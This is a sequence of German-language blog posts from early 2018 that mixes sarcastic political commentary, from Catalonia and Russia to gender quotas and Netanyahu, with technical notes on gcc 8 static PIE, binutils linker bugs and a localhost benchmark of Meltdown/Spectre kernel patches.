Und was hat die "Zeit" gemacht? Ihn und seine Kolumne rausgeschmissen. Und sein Gratis-Abo gekündigt. Warum nicht nur unprofessionell, wenn man auch kindisch den Trotzkopf raushängen lassen kann!
Damit haben sie so tief ins Klo gegriffen, dass sich selbst die ansonsten eher zurückhaltende NZZ sich genötigt sieht, irritiert die Augenbrauen zu lüpfen.
Und nach dem Artikel braucht die "Zeit" mal wieder Brandwundenversorgung. Wieso machen die das immer? Haben die da nur Choleriker am Start? Kein einziger Mitarbeiter, der gewissen Mindestanforderungen an Zivilisation und Professionalität genügt?! Weia.
Update: Fischers Kolumne endete schon im Mai 2017. Er hat aber danach noch weiter einzelne Artikel für die "Zeit" geschrieben.
[l] Was passiert, wenn man "Investoren" eine Zeitung kaufen lässt. In diesem Fall die Denver Post, und der "Investor" ist die Heuschrecke "Alden Global Capital". Das Foto wurde 2013 gemacht, als noch Leute im Newsroom gearbeitet haben. (Danke, Hanno)

Sun Mar 25 2018

[l] Puigdemont wurde in Schleswig-Holstein festgenommen. Das ist der Regional-Präsident, der die Unabhängigkeit Kataloniens angestrebt hatte. Der wohnt anscheinend in Belgien im Exil, aber es gibt einen europäischen Haftbefehl. Jedenfalls war er mit dem Auto auf dem Weg von Finnland nach Belgien und wurde in Deutschland ziemlich direkt aufgegriffen.
Der Haftbefehl ist von Freitag, aber Finnland war in der Umsetzung nicht fix genug.
Spaniens Oberstes Gericht hatte am Freitag Strafverfahren gegen 13 katalanische Politiker eingeleitet - unter ihnen auch der abgesetzte Regionalpräsident Puigdemont. Den hochrangigen Politikern soll der Prozess wegen Rebellion, Veruntreuung und Ungehorsam gemacht werden. Im Falle einer Verurteilung droht den Angeklagten bis zu 30 Jahre Haft.
Das sind ja mal Straftatbestände! Krassomat.
Vielleicht wäre es doch mal an der Zeit, das Strafrecht von Spanien zu ent-franco-isieren?
Update: Bei Rebellion musste ich direkt an den Imperator aus Star Wars denken.

Sat Mar 24 2018

[l] Was kommt eigentlich, wenn man bei Facebook ein Datenschutz-Aufkunftsersuchen stellt?
Hier hat mal jemand eine Übersicht gemacht. Der Typ ist aus Neuseeland, das ist also nicht EU-erkämpft, was der da kriegt. Und er musste auch nicht Bürokratie machen, das war ein Knopf in den Settings. (Danke, Rene)

Sat Mar 17 2018

[l] Wollt ihr mal aus Russland hören statt immer nur über Russland? Dann guckt mal dieses Video hier. Das lief in Russland im Fernsehen. Die Sprecherin des Außenministeriums nimmt Stellung zu der Situation in London. Und das ist sehr interessant zu sehen, wichtiger noch für uns aus dem Westen als für Russen, finde ich. Schon das Format, das die da wählen, ist sehr spannend. Dass es Publikum gibt. Dass die Teilnehmer stehen. Die fette Videoleinwand. Und die Verteidigungsstrategie, die sie wählt.
Inhaltlich fällt als Erstes auf, dass sie nicht mit "wir waren das nicht und weisen diese Vorwürfe entschieden zurück" eröffnet sondern sich da minutenlang über irgendwelche prozeduralen Punkte in Rage redet, die ich an der Stelle weitgehend irrelevant finde. "Die haben keine Beweise" finde ich eine ausgesprochen schwach Eröffnung an der Stelle. Das klingt für mich, als wollten sie der eigenen Bevölkerung gegenüber den Eindruck erwecken, als seien sie es doch gewesen, aber sie brüsteten sich damit, zu schlau vorgegangen zu sein, um von den Briten überführt zu werden.
Mein persönliches Highlight ist bei ca 60%, als der Mann in der Runde meckert, die Briten hätten "uns nicht mal gefragt, ob das unser Gas ist".
Wow. Gut, die Sendung ist jetzt nicht für uns sondern für die Russen gemacht. Dennoch. Das hätte ich echt anders erwartet an der Stelle. Eine Familienpackung Whataboutism finde ich ein bisschen dünn an der Stelle.
Sehr interessante ist auch, wie die Sprecherin die ganze Zeit darauf rumhackt, dass die Briten ja eine Atomnation seien.

Thu Mar 15 2018

[l] Gute Nachrichten! Endlich konnte eine Einigung erzielt werden! Auf CD- und DVD-Rohlinge werden jetzt GEMA-Abgaben fällig. Nein, wirklich! Gutes Timing! Ich wollte mir gerade neue Rohlinge kaufen gehen!1!! (Danke, Ulrich)

Tue Mar 13 2018

[l] Ich hab mich hier lange nicht mehr über T-Systems lustig gemacht. Also gut.
NA SOWAS, Microsofts T-Systems-Version von Azure verkauft sich nicht! Ich habe mich dazu mit einigen Cloud-Großkunden unterhalten. Die sind alle zuerst zu Azure gelaufen und wollten die Deutschland-Cloud. Und dann haben sie beim Testen rausgefunden, dass die von den Features, der Performance und dem Support Monate bis Jahre hinterherhinkt. Und haben sich gedacht: Lieber von den Diensten abgehört werden als von T-Systems aus dem Business verkacken lassen. So jedenfalls die Schilderungen, die bei mir ankamen.
Oh und wo wir gerade dabei sind: Die Bahn überlegt, eigene Mobilfunkmasten aufzustellen, damit sie endlich ordentlich Internet in die Züge kriegen. Auch dazu habe ich eine Gerüchteküche gehört. Die Bahn hatte das ursprünglich wohl mit der Telekom machen wollen, die haben T-Systems auf die losgelassen, und die haben das anscheinend nach Strich und Faden verkackt (Ich weiß! Überraschung!!). Das hat wohl produktiv nie wirklich funktioniert (war 1-2 Jahre online aber hat nicht überzeugt), und die T-Reaktion auf Probleme war unbefriedigend ("wir machen mal ein Ticket auf" statt schneller und unbürokratischer Hilfe oder gar Besserung) und die Bahn hat irgendwann die Reißleine gezogen und den ganzen Internet-Kack an Icomera outgesourced. Ihr wisst schon, die mit der Sicherheitslücke. Und wer schon mal in einer Bahn saß und das Internet benutzen wollte, der wird feststellen: Nicht mal im Bahnhof hat man zuverlässig Internet. Auf der Strecke noch weniger. Wenn ich ein Smartphone mit SIM-Karte der Telekom an den Laptop anschließe, habe ich mehr Deckung, mehr Bandbreite, weniger Latenz und höhere Verfügbarkeit als die Icomera-Lösung, die eine richtige Außenantenne anschließen kann, um ihr Signal zu optimieren. Icomera hat ja angeblich Deals mit allen Mobilfunknetzen und nimmt halt, was gerade da ist.
Für das beobachtete Verhalten sehe ich nur zwei Erklärungen. Entweder die Telekom erkennt Icomera-Sim-Karten und shaped die runter. Oder Icomera routet aus irgendwelchen Gründen lieber nicht über die Telekom, auch wenn das das einzige verfügbare Netz ist.
Das Gerücht, das ich dazu hörte: Die Telekom hat Icomera als einziges Netz keine Flatrate angeboten. :-)
Weiß da zufällig jemand was?
Übrigens finde ich ja, dass das tief blicken lässt, wenn die Bahn lieber mit den Icomera-Verlierern weitermacht, als zur Telekom zurückzugehen. Wie krass hat T-Systems denn da bitte verkackt, dass die Bahn lieber kein Internet in den Zügen hat, als mit denen zusammenzuarbeiten? Wow. Auch dazu würde ich gerne mal ein paar saftige Gerüchte hören.

Mon Mar 12 2018

[l] Einer der größten Investment-Pools sind Versicherer. Die sitzen auf unfassbar viel Geld und möchten das gerne anlegen.
Europa möchte gerne eine Energiewende machen, um die Versprechen des Klimaschutzes umzusetzen. Aber sie möchten gerne kein Geld in die Hand nehmen müssen.
Hey, könnte man da nicht die Versicherungen dazu kriegen, dsas die mit ihrer Kohle unsere Energiewende bezahlen?
Nein, denn Versicherungen dürfen ihr Geld nicht einfach irgendwo investieren, die müssen strenge Risikobewertungen vorlegen, und das Investment in erneuerbare Energien ist dank unserer verkackten Politik eher riskant, weil die Hersteller nach China abgewandert sind und die Preise volatil sind.
Hmm. Hmm. Hey, ich habe eine Idee! Wir ändern das Risiko-Klassifikationsschema, damit "die Welt geht wegen Klimawandel unter" als Risiko auffasst, und quasi Investment in erneuerbare Energien sozusagen eine negative Risikobewertung kriegt.
Hmm. Was wenn die Finanzbranche trotzdem nicht mitmacht? Vielleicht sollten wir denen noch einen Kuhhandel anbieten! Oh ja, ich weiß!
Ein zweiter Aktionsplan verfolgt das Ziel, Europa zum „globalen Fintech-Zentrum“ zu machen.
Ich fürchte, da haben sie ihre Hausaufgaben nicht gemacht. Fintech sind nicht Freund sondern Feind der Finanzbranche. Die ziehen den Banken die Kunden ab, verlangen keine Gebühren, und wenn sie dann Konkurs anmelden, dann haben die Kunden an ihre alten Banken auch die Erwartungshaltung, dass alles kostenlos ist! (Danke, Jan)

Thu Mar 8 2018

[l] Liebe Leser, ihr müsst jetzt sehr tapfer sein. Es ist etwas Unvorhergesehes passiert, etwas, mit dem niemand von uns rechnen konnte. Etwas, das Weltbilder zum Einsturz bringen wird: In Sachsen wurden Nazis wegen Bildung einer terroristischen Vereinigung zu langjährigen Freiheitsstrafen verurteilt. Nein, wirklich! Das erste Mal, dass die Bundesanwaltschaft seit ich denken kann ihre Arbeit gemacht hat.
Ja, ich weiß! Ich bin genauso schockiert wie ihr!

Tue Mar 6 2018

[l] Wenn man LTE systematisch untersucht, kommt raus, dass das kaputter Mist ist. Na sowas! Dass sich das nicht von alleine repariert, wenn man auf GSM aufbaut und dann immer mehr dranpappt, damit konnte nun wirklich niemand rechnen! Dabei haben wir das Protokoll doch extra so komplex gemacht, dass die Probleme nicht mehr offensichtlich sind!
Hätte uns doch nur jemand gewarnt!!1!

Sun Feb 25 2018

[l] Jetzt geht es ans Eingemachte: #MosqueMeToo.

Wed Feb 21 2018

[l] Hattet ihr euch eigentlich gefragt, was aus immer wieder verlängerten Ausnahmezustand in Frankreich geworden ist?
Der ist natürlich immer weiter verlängert worden, bis er im November durch ein neues Antiterrorgesetz abgelöst wurde, das die Sonderbefugnisse permanent gemacht hat.

Tue Feb 20 2018

[l] Es wird euch sicher genau so schockieren wie mich, zu hören, dass die Frauenquote im Aufsichtsrat keines der Versprechen einlösen kann, die die Politik gemacht haben.
When quotas are put on the table, proponents often produce “snapshot” studies showing that companies with more women on their boards have better returns and are less likely to be beset by fraud or shareholder battles. But causation is hard to prove. Perhaps better-managed companies have more scope to promote diversity. Equally, when studies are conducted before and after quotas are imposed, the results in terms of companies’ performance are inconclusive. Some studies find positive effects; others the opposite or no effect at all.
Stimmen Frauen denn freundlicher ab, wenn es z.B. um Entlassungen geht? Nein, auch nicht!
But there was no change in the substance of decisions, such as whether to approve lay-offs. It also found that the process did not change because the new members were women. It was because they were likely to be outsiders.
Aber aber aber mehr Frauen im Aufsichtsrat ist doch bestimmt besser für die Frauen weiter unten in der Hierarchie?! Wenigstens das, Fefe! Wenigstens das!!
Perhaps the most puzzling shortcoming of the quotas is that they have had no discernible beneficial effect on women at lower levels of the corporate hierarchy.
Na sowas. Wie überraschend. Hätte uns doch nur vorher jemand warnen können!1!!
Ich persönlich finde es ja herzlich egal, ob da inkompetente Schlipsträger oder inkompetente Pumpsträger die Kohle verbrennen. Aber dieses ganze ideologisch verbrämte Rumgelüge geht mir auf den Sack. Seid doch einfach ehrlich, liebe Frauen.
Ihr möchtet gerne das große Geld kriegen, ohne dafür die großen Nachteile in Kauf nehmen oder die großen Risiken eingehen zu müssen, mit denen das für Männer verbunden ist. Finde ich völlig nachvollziehbar. Geht mir genau so. Ich hätte auch gerne, dass mir jemand ein Millionengehalt zahlt, dafür dass ich alle paar Monate mal zu einer belanglosen Sitzung fahre und Schnittchen esse, während irreführende Vorträge gehalten werden, die mich gezielt vom Zustand der Firma isolieren, damit ich keinesfalls informierte Entscheidungen treffen kann. Klar klingt das wie ein Traumjob und ich hätte das auch gerne geschenkt.
Aber die Männer kriegen das (völlig überraschend, ich weiß!) gar nicht geschenkt. Die müssen sich 30 Jahre lang im Konkurrenzkampf gegen andere Männer aufrauchen, die den selben Posten haben wollen. Und wenn sie auf dem Weg einen Fehler machen, sind sie weg vom Fenster. Ein Haufen der Männer stirbt auf dem Weg an Herzinfarkt oder die Karriere endet mit Burnout oder auf einem Bullshit-Job in einem belanglosen Bullshit-Gremium ohne ordentliche Entlohnung. Und ihre Kinder sehen solche Männer im Allgemeinen höchstens ne halbe Stunde die Woche am Wochenende mal, wenn's hoch kommt. Frauen konnten da schon immer mitspielen, aber Frauen sind im Durchschnitt einfach zu schlau, ihr Leben für so einen hohlen Scheiß zu opfern. Männer sind so blöde, ihre gesamte Lebensqualität zu opfern, um sich singulär einem bescheuerten Ziel zu widmen. Männer stehen ja auch auf Autorennen und Bergsteigen. Völlig bescheuert. Und ja, gelegentlich kommt mal einer durch. Aber komischerweise fällt der neidvolle Blick der ach so unterdrückten Frauen immer nur auf die drei Leute, die durchgekommen sind, nicht auf die 50000 Männer, die auf dem Weg verendet sind.
Aber wartet, ich weiß genau, was ihr jetzt sagen werden. Nein, wirklich. Moment. Ich kann es fühlen. Wir brauchen einfach MEHR Frauenquote!!1!
Wir sehen uns dann hier in ein paar Jahren wieder, wenn die Zahlen dafür vorliegen. Und auch dann wird sich wieder die Frage stellen, wieso uns denn niemand gewarnt hat.
Wieso fordert eigentlich niemand eine Frauenquote auf dem Mount Everest?
Update: Zur Abrundung: NZZ 2007 über Hausfrauen. Die Situation ist unbefriedigend, und zwar für alle Seiten, und da müsste man mal dringend was tun. Stattdessen werden wir hier mit diesen Nebelkerzen von wegen Frauen-in-die-Aufsichtsräte abgespeist. Ich halte das für die moderne Version von "Trickle Down Economics" ala Reagan. Und inhaltlich ist das ja auch geschickt! Man tut so, als hätte man was getan, und es trifft nur die Superreichen in den Vorständen, mit denen eh niemand Mitleid hat. Tolle Wurst!

Wed Feb 14 2018

[l] Wikileaks ist echt nur noch eine Lachnummer. Die haben einige "low security" Chatsitzungen über Twitter (!) gemacht, da natürlich peinlich aussehenden Scheiß besprochen und das ist jetzt selbstredend zur unopportunen Gelegenheit geleakt.
Einmal mit Profis arbeiten.
[l] In dem seit Jahren laufenden Korruptions-Fall spricht sich jetzt die israelische Polizei dafür aus, Anklage gegen Netanjahu zu erheben. Sie glauben, sie hätten genug Beweise gegen ihn.
Netanjahu hat dann ein paar Minuten, bevor das bei der Presse ankam, eine landesweise TV-Ansage gemacht, die echt gruselig klingt:
Mr. Netanyahu, addressing the nation live on television shortly before the police released their findings around 9 p.m., made clear that he would not step down. “I feel a deep obligation to continue to lead Israel in a way that will ensure our future,” he said, before embarking on a 12-minute defense of his conduct.
“You know I do everything with only one thing in mind — the good of the country,” he said. “Not for cigars from a friend, not for media coverage, not for anything. Only for the good of the state. Nothing has made me deviate, or will make me deviate, from this sacred mission.”
Oje. "sacred mission" klingt ziemlich verzweifelt. Verzweifelt genug für einen neuen Krieg. Syrien hat ja leider nicht auf die Grenzausweitung reagiert; angesichts dieser terminlichen Lage würde ich davon ausgehen, dass das der Plan war. Aber hey, der Gazastreifen geht immer. Oder der Libanon. Einfach sagen, da war Hisbollah.

Thu Feb 8 2018

[l] Netflix hat gerade eine Doku-Serie namens "Dirty Money". Acht Filme über Korruption oder betrügerische Großprojekte, jeweils ca. eine Stunde lang, wenn ich das richtig sehe. Der erste ist über den VW-Abgasskandal, den hab ich gestern geguckt, und der 2. ist über eine bestimmte Firma, die Payday Loans großgemacht haben, und wie sie da ihren Kram strukturell über Indianerstämme geroutet haben, damit die US-Bundesländer sie nicht belangen konnte. Ganz eklig.
Der Stil von diesen Dokumentationen ist, dass sie nicht bloß eine Anklage erheben sondern auch die Beschuldigten reden lassen. Bei VW wollte sich anscheinend niemand verteidigen, aber bei der Payday-Loan-Folge ist das anders. Und das ist eine ausgesprochen bemerkenswerte Erfahrung, das zu gucken. Die Kapazität der Menschen, sich als Opfer zu sehen, ist wirklich immer wieder unfassbar. Man kennt das ja von Twitter, aber dieser Typ bringt das auf eine Art auf den Punkt, die mich echt unkomfortabel zurücklässt gerade. Der Typ hat mit dem ergaunerten Geld auf großem Fuß gelebt und sogar eine Autorennsportkarriere gestartet. In dem Film zeigen sie am Anfang, wie die Polizei die Autos aus seiner Garage rausbeschlagnahmt. Und der Typ sieht sich allen Ernstes als das Opfer in der ganzen Geschichte. Unglaublich.
Sehenswert!

Sun Feb 4 2018

[l] Gerade sind frisch eine neue Binutils-Version und eine neue glibc-Version rausgekommen, und gcc 8 scheint auch fast fertig zu sein. Eines der (aus meiner Sicht) wichtigsten Features von gcc 8 ist der Support für "static PIE". PIE steht für Position Independent Executables. Normalerweise sind Binaries (Programme) auf eine bestimmte Adresse im Speicher hin gebaut. Jeder Prozess hat einen virtuellen Adressraum, und in dem liegen Binaries standardmäßig bei 400000 und ihre Daten ab 600000. Das war historisch nie ein Problem und hat auch Vorteile, weil man dann nämlich im Maschinencode Dinge vereinfachen kann, weil man immer weiß, wo was ist.
Auf der anderen Seite wissen dann auch Hacker, wo was ist. Und weil die Softwareentwicklungsbranche vor vielen Jahren entschieden hat, dass sauber Programmieren zu schwer ist und wir lieber Hacker ärgern wollen, ging die Entwicklung dann dahin, dass man das Programm halt bei jedem Programmstart woanders hin tut im Adressraum. Das nennt sich dann PIE.
Technisch läuft das über einen gruseligen Hack im ELF-Dateiformat, denn das kennt nur Binary (Programm, an statischer Adresse) und Shared Object (Shared Library, an dynamischer Adresse). Das ist schlicht nicht vorgesehen, dass ein Programm an einer zufälligen Adresse geladen wird. Selbst wenn man den Code so formuliert, dass das ginge (was bei Intel/AMD bei 64-bit-Programmen viel einfacher und effizienter geworden ist als bei 32-bit-Programmen, weil der Befehlssatz da ein anderer ist, der darauf ausgelegt ist). Kurz gesagt gibt es bei 64-bit-Programmen eigentlich keine Effizienz-Ausrede mehr, um die nicht positionsunabhängig zu machen. Es gibt natürlich, wenn man genau hinguckt, doch einen Performancenachteil, aber den will ich hier mal außen vor lassen :-)
Der Hack ist jetzt so, dass man in der Datei einträgt, es sei eine Shared Library, kein Programm. Der Kernel lädt die trotzdem und alles ist gut. Das ist leider ein Opt-In-Ding. Wenn ihr unter Linux Software baut, tut mal bitte immer schön -fPIE auf die Compiler-Kommandozeile.
Nun bin ich aber nicht an regulären Binaries interessiert, sondern an statischen Binaries (das ist die Zielgruppe für meine libc). Und der Hack mit dem PIE geht zwar vom Dateiformat her auch bei statisch gelinkten Programmen, aber in der Praxis halt nicht. Ich habe mal ein paar Tage lang versucht, das doch zum Laufen zu kriegen, und bin am Ende gescheitert. Es geht aber prinzipiell. Das weiß ich, weil es jemand anderes geschafft hat: Der Autor der musl-libc. Der gute Mann hat irgendwann bei GNU ein paar Bugs eingetragen, ob es nicht toll wäre, wenn man da nicht so gruselig hacken müsste, wie er es getan hat. Und gcc 8 hat jetzt die Option -static-pie, die genau das tun soll.
Die wollte ich also auch direkt mal ausprobieren, und baute erstmal die neuen binutils, dann den neuen gcc, und jetzt die neue glibc. Und dann fiel mir auf, dass plötzlich meine dietlibc-Binaries größer waren. /bin/true macht im Wesentlichen nichts und sollte eigentlich nur ein paar Bytes groß sein (ein paar ELF-Header brauchen Binaries schon, aber so Größenordnung 200 Bytes ist eigentlich realistisch). War es aber nicht, sondern es war plötzlich über 4k groß. Gut, es war auch vorher weit davon entfernt, weil die dietlibc inzwischen eben eine Menge anderen Kram supportet, der die Startup-Code größer macht. Z.B. den Stack Protector initialisieren, und Thread Local Storage. Aber das true-Binary hätte trotzdem deutlich unter 4k sein müssen.
Ich habe also ein bisschen rumgeguckt, und es stellte sich raus, dass das nur mit dem binutils-bfd-ld so war. binutils ist das Paket unter Linux, aus dem der Assembler und der Linker kommen. binutils hat aber zwei Linker. Den alten mit bfd (der fetten Abstraktionsschicht von binutils) und den neuen, in C++ geschriebenen, der weniger kann, das dafür angeblich besser: GNU gold. Den habe ich normalerweise nicht im Einsatz, weil der bei mir vor Jahren mal Probleme gemacht hat beim Firefox-Linken. Egal. Mit dem gold ist das true-Binary nur 1,3 KB groß. Ich habe also mal reingeguckt und fand in dem statischen Binary von dem bfd-ld eine PLT. PLT steht für Procedure Linkage Table und ist für die Zusammenarbeit (und Umbiegbarkeit mittels LD_PRELOAD) von Shared Libraries da. Das hat in einem statischen Binary nichts verloren. Ich habe mal einen Bug aufgemacht bei binutils.
Ich stellte also auf GNU gold um, und wollte fluchs die neue glibc bauen — aber die baut mit ihrem neuen static-pie-Support für gcc 8 nicht mit gold, nur mit dem bfd-ld. *SEUFZ*
Aber jetzt wo die Infrastruktur da Support für hat, hoffe ich mal, dass auch für die dietlibc static PIE nur noch eine Frage der Zeit ist, möglichst kurzer Zeit. Das will man schon haben, besonders auf 64-bit-x86-Systemen, wo das kaum noch was kostet gegenüber Nicht-PIE.
Aus Frust hab ich jetzt mal true und false in Assembler gehackt für x86/x64 :-)
Update: Stellt sich raus: static pie mit gcc 8 funktioniert auf Anhieb, auch mit dietlibc. Cool!
Update: Gestern Bug gefiled, heute Patch da. Binutils rockt!

Wed Jan 31 2018

[l] Nachdem jetzt der neue Linux-Kernel mit Meltdown+Spectre-Fix draußen ist, wollte ich mal messen, wie sich das auswirkt. Um mal zu gucken, habe ich einen gatling laufen lassen und mit einem Benchmark-Tool ein bisschen Netzwerk-Stress gemacht. Ich habe ein 165MB-File gewählt, das in beiden Fällen natürlich sofort vollständig im Buffer Cache ist.
Die Benchmark-Parameter waren:
```
./bench -n 1000 -c 10 -k -K 5 http://127.0.0.1/testfile
```
Das heißt: 1000 Mal diese Datei laden, über 10 Verbindungen parallel, mit 5 Downloads pro TCP-Verbindung via HTTP-Keepalive. Sowohl das Benchmark-Tool als auch gatling sind Single-Threaded und laufen auf jeweils einem Core nebeneinander. Es sollte also nicht zu vielen Context Switches kommen, aber natürlich sehr viele Wechsel vom User Space in den Kernel und zurück. Und die sind genau das, was durch den Fix langsamer werden. Die CPU ist ein Haswell (noch ohne Microcode-Update). Das sollte also ziemlich nahe am Worst Case sein. Und in der Tat. Mit dem alten Kernel:
```
bench: 164835678432 bytes in 24.7616 seconds.
bench: Throughput: 6.2GiB/sec
bench: Requests per second: 40
```
und mit dem neuen Kernel:
```
bench: 164870699232 bytes in 39.3921 seconds.
bench: Throughput: 3.9GiB/sec
bench: Requests per second: 25
```
Das ist ein ziemlich krasser Einbruch. Und da ist kein SSD beteiligt, das ist alles Buffer Cache ohne tatsächlichen I/O zu tatsächlicher Hardware.
Update: Nach Einspielen des neuen Microcodes wird es ein bisschen weniger schlimm (4.5GiB/sec), aber das ist immer noch katastrophal viel schlechter als vorher. Kann mir mal jemand erzählen, wieso das jetzt keinen Recall gibt?
Ich hatte übrigens den 4.15 mit Retpoline-Support gebaut, aber ohne einen gcc mit Retpoline-Support. Laut Dokumentation werden dann von Hand an einigen Stellen Assembler-Fixes eingebaut.
Update: Intel hatte den Microcode zurückgezogen. Stellt sich raus: Das Microcode-Update, das ich probiert habe, war gar nicht der Meltdown-Fix. Hatte mich schon gewundert, wieso da 2017 dran stand. Damit ist der Unterschied zwischen den 3,9 und den 4,5 GiB/sec anscheinend ~~Messvarianz~~ Messfehler.
Update: Ach und der gcc 7.3, mit dem ich den Kernel gebaut hatte, kann doch Retpolines. Haben sie nur nicht für relevant genug gehalten, um es im Changelog online zu erwähnen.
Update: Haswell ist gar nicht der Worst Case, wie sich rausstellt. Ich habe schon pcid und invpcid im /proc/cpuinfo. Bei Sandy Bridge und co ist das wohl noch deutlich schlimmer.

Tue Jan 30 2018

[l] Ich hab mir natürlich schon Sorgen gemacht, bevor ich nach Mexiko geflogen bin. Mein erster Besuch in Mexiko, und alles, was man bei uns in den Medien hört ist: Katastrophe, Drogenkrieg, Korruption, Schießeren, Tote. So hat es mich dann auch nicht überrascht, dass die Titelseite der einen Zeitung, die mir beim Besteigen des Flugzeugs angeboten wurde, sowas sagte wie (ich kann kein Spanisch aber ein winziges bisschen Französisch und habe ein paar Jahre Latein in der Schule gehabt; den groben Sinn kann ich manchmal erahnen): Innenminister kündigt Militär-Crackdown in besonders von Gewalt betroffenen Bundesländern an.
*grusel*
Jetzt bin ich in Guadalajara, was im Flugzeug so ne Stunde von Mexico City entfernt ist. und die Stadt hat ungefähr die Größe von Berlin. ich hatte eher so mit der Größe von Hannover gerechnet. Man erzählte mir, dass das hier eher so die Reichengegend von Mexiko ist, wo wohl auch eine Menge junge Amis zum Studieren herkommen.
Am Flughafen in Mexiko City stand an jedem Gate so ein großes Poster an einem Ständer. Inhalt war sowas wie:
Die Fluglinien haben euch erzählt, ihre Verspätungen kämen daher, dass das Flugzeug des Präsidenten Priorität hat?
DAS STIMMT NICHT!
Und dann so eine Tortengrafik, wieso Flugzeuge in Mexiko verspätung haben. 44k wegen Airline-Fuckups, 12k wegen Wetter, 4k wegen Flughafen-Fuckups, 0 wegen Präsidentenflugzeug.
Fand ich sehr lustig. So ein bisschen ein "Kurze Durchsage von El Presidente" :-)
Essen holt man sich hier im Taco-Truck, die man auf größeren Parkplätzen findet. Aber mit Absprache untereinander, d.h. jeden Tag ein anderer Truck.
Der öffentliche Nahverkehr passiert mit Bussen, aber die muss man sich eher wie Taxis vorstellen, hat mir ein ortsansässiger Kollege erklärt. Der Bus gehört dem Fahrer, der hat sich eine Lizenz gekauft, und fährt halt grob die wichtigen Strecken ab. Wer mehr Menschen transportiert, macht mehr Profit. Ein Ticket ist daher dann auch nicht bei einem anderen Bus gültig.
Wie das genau ist, hängt wohl von der Region ab. Der Typ war aus Mexico City. Hier in Guadalajara gibt es anscheinend gelegentlich Kontrollen in Bussen, d.h. das System funktioniert offensichtlich subtil anders.
Taxi, Essen und Kleidung sind hier sehr preisgünstig, Elektro-Güter eher teuer. Ich vermute, dass die Regierung den Peso auf Exportfähigkeit getrimmt hat.

Sat Jan 27 2018

[l] Malware-Crew hat 28 Fake Werbeagenturen aufgemacht, um ihre Malware auf Werbenetzwerken zu verteilen. Inklusive Fake-CEO-Profilen auf Linkedin und so.
Ad security company Confiant, the one who discovered this entire operation, says ads bought by this group reached 62% of ad-monetized websites on a weekly basis.
Das finde ich ja nun wieder sehr geil. "Ad Security Company", srsly? Die Werbemafia hat noch ein Layer an Bullshit-Abgreifern in ihre Abzockkaskade eingebaut? Wow.

Tue Jan 23 2018

[l] Gute Nachrichten! Italiens Populismusproblem ist gelöst! Silvio Berlusconi wird Italien vom Populismus retten.
Oh Mann, das ist ja hervorragend! Ich hatte mir schon Sorgen gemacht! (Danke, Manfred)

Sun Jan 21 2018

[l] Endlich! Fake News, der Film!
Die Details klingen aber echt interessant; viel interessanter jedenfalls als "Fake News, der Film". Ein russischer Amerikaner hat einen Film gemacht, der komplett aus Lügen-Clips besteht — allerdings russische Propaganda, die in Russland ausgestrahlt wurde. Vermutlich mit Untertiteln dann. Und wir reden hier nicht von Nachrichtensprechern, die Mist erzählen, sondern so Nachrichtenclips mit Sprecher im Hintergrund.
Wir hatten das Verfahren ja schonmal in Alternatvlos erläutert, aber das Zitat hier bringt es gut auf den Punkt:
“Even facts that are easy to verify, like where Donald Trump is from,” he said. “They do it like ‘maybe he’s from Brooklyn, maybe he’s from Queens, different people say different things.’ ” It’s meant to confuse so that the viewer doesn’t believe in any objective truth — so that objective truth begins not to matter.”
Ich hoffe, den Film kann man dann auch hier irgendwie sehen. Das will ich mir auf jeden Fall angucken.
Update: Ist das der hier?
Update: Das scheint so eine Art Kurzform zu sein und es gibt schon noch einen ganzen 90-Minuten-Film.
[l] Bei Technik (und auch sonstigen Lebensumständen) habe ich mehrfach die Erfahrung gemacht, dass es Dinge gibt, bei denen man nicht mehr gewillt ist, auf den alten Stand zurückzugehen, wenn man das einmal in ordentlich erlebt hat. Ich erinnere mich noch an den Übergang von Röhrenmonitoren zu Flachbildschirmen, das war sowas. Oder wenn man zuhause mehr Internet-Bandbreite kriegt, dann fühlen sich so Hotel-WLANs plötzlich viel schlimmer an, geradezu unaushaltbar schlimm. Oder bei SSDs ist es auch so.
Wieso nutzen Firmen das eigentlich nicht aus? Firmen geben ein Heidengeld aus, um Mitarbeiter an sich zu binden, damit die nicht nach der Ausbildung woanders hin gehen. Aber bei Software tolerieren die Kreativität- und Lebensfreude-vernichtende Krückenlösungen. Schlechte Stühle, schlechte Tische, Großraumbüros, das hatte ich ja schon in meinem Antipatterns-Vortrag. Aber erweitert das mal auf Software und bürokratische Prozesse. Stellt euch mal vor, in einer Firma funktionieren die Prozesse von alleine, völlig stressfrei. Du brauchst irgendwas? Die Dokumentation ist verfügbar und auffindbar, das Formular fragt dich nicht nach Dingen, die die Firma eh schon über dich weiß, du musst nicht Internet Explorer 8 benutzen, damit die Seite funktioniert, sowas.
Das erstreckt sich auch auf ganz praktische Aspekte bei der Softwareentwicklung.
Normalerweise, wenn ich zum Kunden gehe, vergeht der erste Tag damit, dass die ihre Bürokratie auf die Reihe kriegen. Und das ist der gute Fall, nachdem die schon in Vorarbeit gegangen sind. Das ist nur noch sowas wie Badges abholen, Account aktivieren, Netzwerkzugang kriegen, Zugang zum Quellcode, etc. Aber ich habe einmal erlebt, bei VMware, dass dieser ganze Kram schon fertig war, bzw. "mal eben schnell geklickt wurde" in dem Meeting am Anfang. So ala "Was brauchen wir? Einen Server mit dem Quellcode? Braucht ihr den auf einer festen IP? Wollt ihr Windows mit Visual Studio? Eclipse? Linux? Alles einmal?" und während wir die Frage beantworteten, klickten die da kurz zusammen, Instanzen fuhren irgendwo hoch, und fertig war die Laube.
Na gut, denkt ihr euch jetzt vielleicht, das ist ja auch deren Kerngeschäft. VMs hochfahren. Ja und nein. Ich habe schon Datenbankhersteller erlebt, wo es mehrere Tage dauerte, bis ein Account im System war, und dann nach Abholen des Badges dauerte es nochmal einen Tag, bis das Aktiv-Flag sich durchs System repliziert hatte und man sich auch einloggen konnte. Und das ist noch nicht einer der schlimmsten Fälle. In den meisten Firmen da draußen ist die Infrastruktur in bemitleidenswertem Zustand, und die Leute arrangieren sich einfach damit.
Ich frage mich gerade, ob man das nicht ändern könnte, wenn man da bloß aus einer anderen Perspektive draufguckt. Wenn man das als Maßnahme zur Mitarbeiterbindung sieht. Denn wer einmal in einer Firma war, wo so Lebensqualitätsvernichtungsscheiß nicht mehr vorkommt, der geht doch nie wieder woanders hin! Was meint ihr?
[l] Der nächste NetzDG-Kollateralschaden ist wieder ein Satiriker. Er hatte sich über eine rassistische Werbekampagne von H&M lustig gemacht, und Facebook hat ihm den Account zugemacht.

Sat Jan 20 2018

[l] Liebe Leser, hier nochmal eine explizite Durchsage zur Medienkompetenz.
